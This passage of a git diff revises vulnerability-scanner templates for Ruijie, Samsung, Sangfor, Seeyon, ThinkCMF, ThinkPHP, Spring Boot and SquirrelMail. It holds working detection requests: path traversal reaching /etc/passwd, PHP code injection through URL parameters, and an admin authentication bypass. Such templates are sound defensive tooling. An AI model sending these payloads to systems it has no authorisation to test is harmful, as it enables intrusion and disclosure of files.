     - https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20cli.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
     - https://www.ruijienetworks.com
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
   tags: ruijie,rce
 
 requests:
@@ -54,3 +57,5 @@ requests:
         internal: true
         regex:
           - 'admin ([a-zA-Z0-9#@]+)",'
+
+# Enhanced by mp on 2022/06/03
diff --git a/vulnerabilities/ruijie/ruijie-networks-lfi.yaml b/vulnerabilities/ruijie/ruijie-networks-lfi.yaml
index 796119899a..d5ff6505d1 100644
--- a/vulnerabilities/ruijie/ruijie-networks-lfi.yaml
+++ b/vulnerabilities/ruijie/ruijie-networks-lfi.yaml
@@ -1,13 +1,17 @@
 id: ruijie-networks-lfi
 
 info:
-  name: Ruijie Networks Switch eWeb S29_RGOS 11.4 LFI
+  name: Ruijie Networks Switch eWeb S29_RGOS 11.4 - Local File Inclusion
   author: pikpikcu
   severity: high
-  description: A vulnerability in Ruijie Networks Switch allows remote unauthenticated attackers to access locally stored files and retrieve their content via the 'download.do' endpoint.
+  description: Ruijie Networks Switch eWeb S29_RGOS 11.4 is vulnerable to local file inclusion and allows remote unauthenticated attackers to access locally stored files and retrieve their content via the 'download.do' endpoint.
   reference:
     - https://exploit-db.com/exploits/48755
-  tags: ruijie,lfi
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
+  tags: ruijie,lfi,edb
 
 requests:
   - method: GET
@@ -30,3 +34,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/04
diff --git a/vulnerabilities/ruijie/ruijie-networks-rce.yaml b/vulnerabilities/ruijie/ruijie-networks-rce.yaml
index 5285f1a570..bf405a66f3 100644
--- a/vulnerabilities/ruijie/ruijie-networks-rce.yaml
+++ b/vulnerabilities/ruijie/ruijie-networks-rce.yaml
@@ -1,12 +1,17 @@
 id: ruijie-networks-rce
 
 info:
-  name: Ruijie Networks-EWEB Network Management System RCE
+  name: Ruijie Networks-EWEB Network Management System - Remote Code Execution
   author: pikpikcu
+  description: Ruijie Networks EWEB Network Management System is susceptible to remote code execution.
   severity: critical
   reference:
     - https://github.com/yumusb/EgGateWayGetShell_py/blob/main/eg.py
     - https://www.ruijienetworks.com
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
   tags: ruijie,rce,network
 
 requests:
@@ -34,3 +39,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/03
diff --git a/vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml b/vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml
index 6a77076f13..b1d02e9f17 100644
--- a/vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml
+++ b/vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml
@@ -1,11 +1,16 @@
 id: samsung-wlan-ap-lfi
 
 info:
-  name: Samsung Wlan AP (WEA453e) LFI
+  name: Samsung WLAN AP WEA453e - Local File Inclusion
   author: pikpikcu
-  severity: critical
+  severity: high
+  description: Samsung WLAN AP WEA453e is susceptible to local file inclusion vulnerabilities.
   reference:
-    - https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/
+    - https://omriinbar.medium.com/samsung-wlan-ap-wea453e-vulnerabilities-7aa4a57d4dba
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+    cvss-score: 8.6
+    cwe-id: CWE-22
   tags: xss,samsung,lfi
 
 requests:
@@ -23,3 +28,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/05/31
diff --git a/vulnerabilities/samsung/samsung-wlan-ap-rce.yaml b/vulnerabilities/samsung/samsung-wlan-ap-rce.yaml
index 3d2ab419f2..cc6de82ce4 100644
--- a/vulnerabilities/samsung/samsung-wlan-ap-rce.yaml
+++ b/vulnerabilities/samsung/samsung-wlan-ap-rce.yaml
@@ -1,11 +1,16 @@
 id: samsung-wlan-ap-rce
 
 info:
-  name: Samsung Wlan AP (WEA453e) RCE
+  name: Samsung WLAN AP WEA453e - Remote Code Execution
   author: pikpikcu
   severity: critical
+  description: Samsung WLAN AP WEA453e is vulnerable to a pre-auth root remote command execution vulnerability, which means an attacker could run code as root remotely without logging in.
   reference:
-    - https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/
+    - https://omriinbar.medium.com/samsung-wlan-ap-wea453e-vulnerabilities-7aa4a57d4dba
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
   tags: xss,samsung,rce
 
 requests:
@@ -25,3 +30,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/05/31
diff --git a/vulnerabilities/samsung/samsung-wlan-ap-xss.yaml b/vulnerabilities/samsung/samsung-wlan-ap-xss.yaml
index 05a6201a35..260922acbf 100644
--- a/vulnerabilities/samsung/samsung-wlan-ap-xss.yaml
+++ b/vulnerabilities/samsung/samsung-wlan-ap-xss.yaml
@@ -1,12 +1,12 @@
 id: samsung-wlan-ap-xss
 
 info:
-  name: Samsung Wlan AP (WEA453e) XSS
+  name: Samsung Wlan AP (WEA453e) - Cross-Site Scripting
   author: pikpikcu
   severity: medium
   reference:
     - https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/
-  tags: xss,samsung,xss
+  tags: xss,samsung
 
 requests:
   - method: GET
@@ -27,4 +27,4 @@ requests:
       - type: word
         words:
           - "text/html"
-        part: header
\ No newline at end of file
+        part: header
diff --git a/vulnerabilities/sangfor/sangfor-ba-rce.yaml b/vulnerabilities/sangfor/sangfor-ba-rce.yaml
new file mode 100644
index 0000000000..ea2aee22c7
--- /dev/null
+++ b/vulnerabilities/sangfor/sangfor-ba-rce.yaml
@@ -0,0 +1,36 @@
+id: sangfor-ba-rce
+
+info:
+  name: Sangfor BA - Remote Code Execution
+  author: ritikchaddha
+  severity: critical
+  description: |
+    Sangfor products allow remote unauthenticated users to cause the product to execute arbitrary commands.
+  reference:
+    - https://mobile.twitter.com/sec715/status/1406886851072253953
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
+  metadata:
+    verified: true
+    fofa-query: app="sangfor"
+  tags: rce,sangfor
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/tool/log/c.php?strip_slashes=md5&host={{randstr}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{md5("{{randstr}}")}}'
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/05/30
diff --git a/vulnerabilities/other/sangfor-edr-auth-bypass.yaml b/vulnerabilities/sangfor/sangfor-edr-auth-bypass.yaml
similarity index 70%
rename from vulnerabilities/other/sangfor-edr-auth-bypass.yaml
rename to vulnerabilities/sangfor/sangfor-edr-auth-bypass.yaml
index 43abcf1ad7..f92ce01d6f 100644
--- a/vulnerabilities/other/sangfor-edr-auth-bypass.yaml
+++ b/vulnerabilities/sangfor/sangfor-edr-auth-bypass.yaml
@@ -4,29 +4,36 @@ info:
   name: Sangfor EDR Authentication Bypass
   author: princechaddha
   severity: high
-  description: A vulnerability in Sangfor EDR allows remote attackers to access the system with 'admin' privileges by accessing the login page directly using a provided username rather than going through the login
+  description: |
+    A vulnerability in Sangfor EDR allows remote attackers to access the system with 'admin' privileges by accessing the login page directly using a provided username rather than going through the login
     screen without providing a username.
+  metadata:
+    fofa-query: app="sangfor"
   tags: sangfor,auth-bypass,login
 
 requests:
   - method: GET
     path:
       - "{{BaseURL}}/ui/login.php?user=admin"
+
     matchers-condition: and
     matchers:
+      - type: word
+        part: body
+        words:
+          - "/download/edr_installer_"
+
+      - type: word
+        part: header
+        words:
+          - 'Set-Cookie=""'
+        negative: true
+
+      - type: word
+        part: header
+        words:
+          - 'Set-Cookie='
+
       - type: status
         status:
           - 302
-      - type: word
-        words:
-          - "/download/edr_installer_"
-        part: body
-      - type: word
-        words:
-          - 'Set-Cookie=""'
-        part: header
-        negative: true
-      - type: word
-        words:
-          - 'Set-Cookie='
-        part: header
diff --git a/vulnerabilities/other/sangfor-edr-rce.yaml b/vulnerabilities/sangfor/sangfor-edr-rce.yaml
similarity index 61%
rename from vulnerabilities/other/sangfor-edr-rce.yaml
rename to vulnerabilities/sangfor/sangfor-edr-rce.yaml
index 309c0580be..3c144211c8 100644
--- a/vulnerabilities/other/sangfor-edr-rce.yaml
+++ b/vulnerabilities/sangfor/sangfor-edr-rce.yaml
@@ -1,12 +1,18 @@
 id: sangfor-edr-rce
 
 info:
-  name: Sangfor EDR 3.2.17R1/3.2.21 RCE
+  name: Sangfor EDR 3.2.17R1/3.2.21 - Remote Code Execution
   author: pikpikcu
   severity: critical
-  description: A vulnerability in Sangfor EDR product allows remote unauthenticated users to cause the product to execute arbitrary commands.
+  description: Sangfor EDR 3.2.17R1/3.2.21 allows remote unauthenticated users to to execute arbitrary commands.
   reference:
     - https://www.cnblogs.com/0day-li/p/13650452.html
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
+  metadata:
+    fofa-query: app="sangfor"
   tags: rce,sangfor
 
 requests:
@@ -21,9 +27,12 @@ requests:
     matchers-condition: and
     matchers:
       - type: regex
+        part: body
         regex:
           - "root:.*:0:0:"
-        part: body
+
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/05/31
diff --git a/vulnerabilities/other/wooyun-2015-148227.yaml b/vulnerabilities/seeyon/wooyun-2015-148227.yaml
similarity index 59%
rename from vulnerabilities/other/wooyun-2015-148227.yaml
rename to vulnerabilities/seeyon/wooyun-2015-148227.yaml
index 4a65d8356a..105f18c2f5 100644
--- a/vulnerabilities/other/wooyun-2015-148227.yaml
+++ b/vulnerabilities/seeyon/wooyun-2015-148227.yaml
@@ -1,13 +1,17 @@
 id: wooyun-2015-148227
 
 info:
-  name: Seeyon WooYun LFR
+  name: Seeyon WooYun - Local File Inclusion
   author: princechaddha
   severity: high
-  description: A vulnerability in Seeyon WooYun allows remote attackers to include the content of locally stored content and disclose it back to the attacker.
+  description: Seeyon WooYun allows remote attackers to include the content of locally stored content and disclose it back to the attacker via local file inclusion.
   reference:
     - https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html
-  tags: seeyon,wooyun,lfi
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
+  tags: seeyon,wooyun,lfi,zhiyuan
 
 requests:
   - method: GET
@@ -26,3 +30,5 @@ requests:
         part: header
         words:
           - "application/xml"
+
+# Enhanced by mp on 2022/08/04
diff --git a/vulnerabilities/other/zhiyuan-file-upload.yaml b/vulnerabilities/seeyon/zhiyuan-file-upload.yaml
similarity index 94%
rename from vulnerabilities/other/zhiyuan-file-upload.yaml
rename to vulnerabilities/seeyon/zhiyuan-file-upload.yaml
index 4057d76160..7be425211a 100644
--- a/vulnerabilities/other/zhiyuan-file-upload.yaml
+++ b/vulnerabilities/seeyon/zhiyuan-file-upload.yaml
@@ -8,7 +8,7 @@ info:
   reference:
     - https://www.programmersought.com/article/92658169875/
   remediation: Apply the appropriate patch.
-  tags: zhiyuan,rce,upload
+  tags: zhiyuan,rce,fileupload,seeyon,intrusive
 
 requests:
   - method: GET
diff --git a/vulnerabilities/other/zhiyuan-oa-info-leak.yaml b/vulnerabilities/seeyon/zhiyuan-oa-info-leak.yaml
similarity index 93%
rename from vulnerabilities/other/zhiyuan-oa-info-leak.yaml
rename to vulnerabilities/seeyon/zhiyuan-oa-info-leak.yaml
index 53256a5be1..28d60c990c 100644
--- a/vulnerabilities/other/zhiyuan-oa-info-leak.yaml
+++ b/vulnerabilities/seeyon/zhiyuan-oa-info-leak.yaml
@@ -6,7 +6,7 @@ info:
   severity: info
   reference:
     - https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3351.md
-  tags: zhiyuan,leak,disclosure
+  tags: zhiyuan,leak,disclosure,seeyon
 
 requests:
   - method: GET
diff --git a/vulnerabilities/other/zhiyuan-oa-session-leak.yaml b/vulnerabilities/seeyon/zhiyuan-oa-session-leak.yaml
similarity index 94%
rename from vulnerabilities/other/zhiyuan-oa-session-leak.yaml
rename to vulnerabilities/seeyon/zhiyuan-oa-session-leak.yaml
index 0bc5c52bf0..4b48de4deb 100644
--- a/vulnerabilities/other/zhiyuan-oa-session-leak.yaml
+++ b/vulnerabilities/seeyon/zhiyuan-oa-session-leak.yaml
@@ -7,7 +7,7 @@ info:
   description: A vulnerability in Zhiyuan OA allows remote unauthenticated users access to sensitive session information via the 'getSessionList.jsp' endpoint.
   reference:
     - https://www.zhihuifly.com/t/topic/3345
-  tags: zhiyuan,leak,disclosure
+  tags: zhiyuan,leak,disclosure,seeyon
 
 requests:
   - method: GET
diff --git a/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml b/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml
index 169542633f..4d25d0af0d 100644
--- a/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml
+++ b/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml
@@ -3,7 +3,7 @@ id: simple-crm-sql-injection
 info:
   name: Simple CRM 3.0 SQL Injection and Authentication Bypass
   author: geeknik
-  severity: high
+  severity: critical
   description: Simple CRM 3.0 is susceptible to SQL injection and authentication bypass vulnerabilities.
   reference:
     - https://packetstormsecurity.com/files/163254/simplecrm30-sql.txt
@@ -11,7 +11,7 @@ info:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
     cvss-score: 10.0
     cwe-id: CWE-89
-  tags: sqli,simplecrm,auth-bypass,injection
+  tags: packetstorm,sqli,simplecrm,auth-bypass,injection
 
 requests:
   - method: POST
diff --git a/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml b/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml
index d4673ea0fa..6c614c7f55 100644
--- a/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml
+++ b/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml
@@ -17,16 +17,17 @@ requests:
       - "{{BaseURL}}/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml"
       - "{{BaseURL}}/actuator/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/random:915!/logback.xml"
 
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
-
       - type: word
         part: body
         words:
           - "http:\\/\\/nonexistent:31337\\/logback.xml"
           - "reloadByURL"
           - "JoranException"
-        condition: and
\ No newline at end of file
+        condition: and
+
+      - type: status
+        status:
+          - 200
\ No newline at end of file
diff --git a/vulnerabilities/springboot/springboot-h2-db-rce.yaml b/vulnerabilities/springboot/springboot-h2-db-rce.yaml
index 6399788794..40ddf6fe9c 100644
--- a/vulnerabilities/springboot/springboot-h2-db-rce.yaml
+++ b/vulnerabilities/springboot/springboot-h2-db-rce.yaml
@@ -1,14 +1,19 @@
 id: springboot-h2-db-rce
 
 info:
-  name: Spring Boot H2 Database RCE
+  name: Spring Boot H2 Database - Remote Command Execution
   author: dwisiswant0
   severity: critical
+  description: Spring Boot H2 Database is susceptible to remote code execution.
   reference:
     - https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database
     - https://twitter.com/pyn3rd/status/1305151887964946432
     - https://www.veracode.com/blog/research/exploiting-spring-boot-actuators
     - https://github.com/spaceraccoon/spring-boot-actuator-h2-rce
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
   metadata:
     shodan-query: http.favicon.hash:116323821
   tags: springboot,rce,jolokia
@@ -34,4 +39,6 @@ requests:
       - type: word
         part: body
         words:
-          - '"spring.datasource.hikari.connection-test-query":"CREATE ALIAS EXEC AS CONCAT'
\ No newline at end of file
+          - '"spring.datasource.hikari.connection-test-query":"CREATE ALIAS EXEC AS CONCAT'
+
+# Enhanced by mp on 2022/05/31
diff --git a/vulnerabilities/springboot/springboot-log4j-rce.yaml b/vulnerabilities/springboot/springboot-log4j-rce.yaml
index 4286931f8d..5936bb1770 100644
--- a/vulnerabilities/springboot/springboot-log4j-rce.yaml
+++ b/vulnerabilities/springboot/springboot-log4j-rce.yaml
@@ -1,20 +1,22 @@
 id: springboot-log4j-rce
 
 info:
-  name: Spring Boot Log4j Remote Code Injection
+  name: Spring Boot - Remote Code Execution (Apache Log4j)
   author: pdteam
   severity: critical
+  description: Spring Boot is susceptible to remote code execution via Apache Log4j.
   reference:
     - https://logging.apache.org/log4j/2.x/security.html
     - https://www.lunasec.io/docs/blog/log4j-zero-day/
     - https://github.com/twseptian/Spring-Boot-Log4j-CVE-2021-44228-Docker-Lab
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
+  remediation: Upgrade to Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later).
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
-    cvss-score: 10.0
+    cvss-score: 10
     cve-id: CVE-2021-44228
     cwe-id: CWE-502
-  remediation: Upgrade to Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later).
-  tags: springboot,rce,oast,log4j
+  tags: cve,cve2021,springboot,rce,oast,log4j,kev
 
 requests:
   - raw:
@@ -44,4 +46,6 @@ requests:
         part: interactsh_request
         group: 1
         regex:
-          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'  # Print extracted ${hostName} in output
\ No newline at end of file
+          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'  # Print extracted ${hostName} in output
+
+# Enhanced by mp on 2022/05/31
diff --git a/vulnerabilities/squirrelmail/squirrelmail-add-xss.yaml b/vulnerabilities/squirrelmail/squirrelmail-add-xss.yaml
index e54ece65b7..d62c8be3e5 100644
--- a/vulnerabilities/squirrelmail/squirrelmail-add-xss.yaml
+++ b/vulnerabilities/squirrelmail/squirrelmail-add-xss.yaml
@@ -7,7 +7,7 @@ info:
   description: SquirrelMail Address Add Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
   reference:
     - https://www.exploit-db.com/exploits/26305
-  tags: xss,squirrelmail,plugin
+  tags: edb,xss,squirrelmail,plugin
 
 requests:
   - method: GET
diff --git a/vulnerabilities/squirrelmail/squirrelmail-lfi.yaml b/vulnerabilities/squirrelmail/squirrelmail-lfi.yaml
index f87a7c33a5..ad9f4b6671 100644
--- a/vulnerabilities/squirrelmail/squirrelmail-lfi.yaml
+++ b/vulnerabilities/squirrelmail/squirrelmail-lfi.yaml
@@ -1,12 +1,17 @@
 id: squirrelmail-lfi
 
 info:
-  name: SquirrelMail 1.2.11 Local File Inclusion
+  name: SquirrelMail 1.2.11 - Local File Inclusion
   author: dhiyaneshDk
   severity: high
+  description: SquirrelMail 1.2.11 is vulnerable to local file inclusion.
   reference:
     - https://www.exploit-db.com/exploits/22793
-  tags: lfi,squirrelmail
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
+  tags: lfi,squirrelmail,edb
 
 requests:
   - method: GET
@@ -25,3 +30,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/05
diff --git a/vulnerabilities/squirrelmail/squirrelmail-vkeyboard-xss.yaml b/vulnerabilities/squirrelmail/squirrelmail-vkeyboard-xss.yaml
index dddf453c8f..8a3578b3e2 100644
--- a/vulnerabilities/squirrelmail/squirrelmail-vkeyboard-xss.yaml
+++ b/vulnerabilities/squirrelmail/squirrelmail-vkeyboard-xss.yaml
@@ -7,7 +7,7 @@ info:
   description: The Virtual Keyboard plugin for SquirrelMail is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
   reference:
     - https://www.exploit-db.com/exploits/34814
-  tags: xss,squirrelmail,plugin
+  tags: xss,squirrelmail,plugin,edb
 
 requests:
   - method: GET
diff --git a/vulnerabilities/thinkcmf/thinkcmf-arbitrary-code-execution.yaml b/vulnerabilities/thinkcmf/thinkcmf-arbitrary-code-execution.yaml
index aaec11c2ff..083f29a523 100644
--- a/vulnerabilities/thinkcmf/thinkcmf-arbitrary-code-execution.yaml
+++ b/vulnerabilities/thinkcmf/thinkcmf-arbitrary-code-execution.yaml
@@ -6,22 +6,18 @@ info:
   severity: high
   reference:
     - https://www.shuzhiduo.com/A/l1dygr36Je/
-  tags: thinkcmf
+  tags: thinkcmf,rce
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/index.php?g=g&m=Door&a=index&content=<?php%20phpinfo();"
+      - "{{BaseURL}}/index.php?g=g&m=Door&a=index&content=<?php%20echo%20md5('ThinkCMF');"
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - "PHP Extension"
-          - "PHP Version"
-          - "PHP License"
-          - "PHP Variables"
-        condition: and
+          - "d9b2c63a497e2f30c4ad9ad083a00691"
 
       - type: status
         status:
diff --git a/vulnerabilities/thinkcmf/thinkcmf-lfi.yaml b/vulnerabilities/thinkcmf/thinkcmf-lfi.yaml
index f226eaae21..ef1f4fab55 100644
--- a/vulnerabilities/thinkcmf/thinkcmf-lfi.yaml
+++ b/vulnerabilities/thinkcmf/thinkcmf-lfi.yaml
@@ -1,14 +1,19 @@
 id: thinkcmf-lfi
 
 info:
-  name: ThinkCMF LFI
+  name: ThinkCMF - Local File Inclusion
   author: pikpikcu
   severity: high
+  description: ThinkCMF is vulnerable to local file inclusion.
   reference:
     - https://www.freebuf.com/vuls/217586.html
   metadata:
     win-payload: ../../../../../../../../../../../../../../../../windows/win.ini
     unix-payload: ../../../../../../../../../../../../../../../../etc/passwd
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
   tags: thinkcmf,lfi
 
 requests:
@@ -29,3 +34,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/05
diff --git a/vulnerabilities/thinkcmf/thinkcmf-rce.yaml b/vulnerabilities/thinkcmf/thinkcmf-rce.yaml
index cd53e288b5..dbd60cc3bf 100644
--- a/vulnerabilities/thinkcmf/thinkcmf-rce.yaml
+++ b/vulnerabilities/thinkcmf/thinkcmf-rce.yaml
@@ -1,11 +1,16 @@
 id: thinkcmf-rce
 
 info:
-  name: ThinkCMF RCE
+  name: ThinkCMF - Remote Code Execution
   author: pikpikcu
   severity: critical
+  description: ThinkCMF  is susceptible to a remote code execution vulnerability.
   reference:
     - https://www.freebuf.com/vuls/217586.html
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
   tags: thinkcmf,rce
 
 requests:
@@ -25,4 +30,6 @@ requests:
           - 'contains(body_2, "PHP Extension")'
           - 'contains(body_2, "PHP Version")'
           - 'status_code_2 == 200'
-        condition: and
\ No newline at end of file
+        condition: and
+
+# Enhanced by mp on 2022/05/31
diff --git a/vulnerabilities/thinkphp/thinkphp-2-rce.yaml b/vulnerabilities/thinkphp/thinkphp-2-rce.yaml
index daac2251b9..d437ac655a 100644
--- a/vulnerabilities/thinkphp/thinkphp-2-rce.yaml
+++ b/vulnerabilities/thinkphp/thinkphp-2-rce.yaml
@@ -1,27 +1,27 @@
-id: thinkphp-2-rce
+id: thinkphp-2-rce
 
-info:
-  name: ThinkPHP 2 / 3 's' Parameter RCE
-  author: dr_set
-  severity: critical
-  description: ThinkPHP 2.x version and 3.0 in Lite mode Remote Code Execution.
-  reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/2-rce
-  tags: thinkphp,rce
+info:
+  name: ThinkPHP 2 / 3 's' Parameter RCE
+  author: dr_set
+  severity: critical
+  description: ThinkPHP 2.x version and 3.0 in Lite mode Remote Code Execution.
+  reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/2-rce
+  tags: thinkphp,rce
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/index.php?s=/index/index/name/$%7B@phpinfo()%7D"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "PHP Extension"
-          - "PHP Version"
-          - "ThinkPHP"
-        condition: and
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?s=/index/index/name/$%7B@phpinfo()%7D"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "PHP Extension"
+          - "PHP Version"
+          - "ThinkPHP"
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/thinkphp/thinkphp-501-rce.yaml b/vulnerabilities/thinkphp/thinkphp-501-rce.yaml
index 7184e4218d..6fff93da1e 100644
--- a/vulnerabilities/thinkphp/thinkphp-501-rce.yaml
+++ b/vulnerabilities/thinkphp/thinkphp-501-rce.yaml
@@ -1,10 +1,14 @@
 id: thinkphp-501-rce
 
 info:
-  name: ThinkPHP 5.0.1 RCE
+  name: ThinkPHP 5.0.1 - Remote Code Execution
   author: lark-lab
   severity: critical
-  description: A vulnerability in ThinkPHP allows remote unauthenticated attackers to cause the product to execute arbitrary code via the 's' parameter.
+  description: ThinkPHP 5.0.1 allows remote unauthenticated attackers to  execute arbitrary code via the 's' parameter.
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
   tags: thinkphp,rce
 
 requests:
@@ -26,3 +30,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/05/31
diff --git a/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml b/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml
index 5d6b6a2362..6efefcf299 100644
--- a/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml
+++ b/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml
@@ -1,27 +1,27 @@
-id: thinkphp-5022-rce
+id: thinkphp-5022-rce
 
-info:
-  name: ThinkPHP 5.0.22 RCE
-  author: dr_set
-  severity: critical
-  description: Thinkphp5 5.0.22/5.1.29 Remote Code Execution if the website doesn't have mandatory routing enabled (which is default).
-  reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/5-rce
-  tags: thinkphp,rce
+info:
+  name: ThinkPHP 5.0.22 RCE
+  author: dr_set
+  severity: critical
+  description: Thinkphp5 5.0.22/5.1.29 Remote Code Execution if the website doesn't have mandatory routing enabled (which is default).
+  reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/5-rce
+  tags: thinkphp,rce
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "PHP Extension"
-          - "PHP Version"
-          - "ThinkPHP"
-        condition: and
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "PHP Extension"
+          - "PHP Version"
+          - "ThinkPHP"
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml b/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml
index 1cda70e12f..7f9bd46a05 100644
--- a/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml
+++ b/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml
@@ -1,32 +1,32 @@
-id: thinkphp-5023-rce
+id: thinkphp-5023-rce
 
-info:
-  name: ThinkPHP 5.0.23 RCE
-  author: dr_set
-  severity: critical
-  description: Thinkphp5 5.0(<5.0.24) Remote Code Execution.
